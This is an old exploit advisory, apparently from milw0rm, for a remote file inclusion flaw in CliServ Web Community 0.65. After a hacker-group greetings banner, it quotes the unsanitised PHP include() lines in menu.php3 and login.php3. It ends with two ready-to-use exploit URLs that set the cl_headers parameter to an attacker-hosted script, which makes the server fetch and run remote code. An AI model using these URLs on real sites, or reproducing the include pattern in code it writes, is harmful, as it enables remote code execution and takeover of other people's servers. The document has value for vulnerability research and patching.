66 lines
No EOL
1.6 KiB
Text
66 lines
No EOL
1.6 KiB
Text
/*
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- CliServ Web Community <= 0.65 (cl_headers) Remote File Include Vulnerability
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- [Script name: CliServ Web Community v. 0.65
|
|
- [Script site: http://sourceforge.net/projects/cliserv/
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Find by: Kacper (a.k.a Rahim)
|
|
+
|
|
- Contact: kacper1964@yahoo.pl
|
|
- or
|
|
- http://www.rahim.webd.pl/
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Special Greetz: DragonHeart ;-)
|
|
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx
|
|
-
|
|
!@ Przyjazni nie da sie zamienic na marne korzysci @!
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Z Dedykacja dla osoby,
|
|
- bez ktorej nie mogl bym zyc...
|
|
- K.C:* J.M (a.k.a Magaja)
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
*/
|
|
/*
|
|
vulnerable code => menu.php3 line 4-8:
|
|
....
|
|
|
|
include($cl_headers);
|
|
$query = "DELETE FROM cl_notice WHERE n_expire < ". time();
|
|
$result = db_exec($connection, $query);
|
|
if($cl_loggedin == "2") {
|
|
....
|
|
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
vulnerable code => login.php3 line 4-8:
|
|
....
|
|
|
|
include($cl_header);
|
|
|
|
?>
|
|
<FORM METHOD="POST" ACTION="index.php3">
|
|
....
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
*/
|
|
|
|
#Exploit:
|
|
|
|
http://www.site.com/[CliServ_path]/menu.php3?cl_headers=[http://www.myevilsite.com/evil_scripts.txt]
|
|
|
|
http://www.site.com/[CliServ_path]/login.php3?cl_headers=[http://www.myevilsite.com/evil_scripts.txt]
|
|
|
|
# milw0rm.com [2006-08-25] |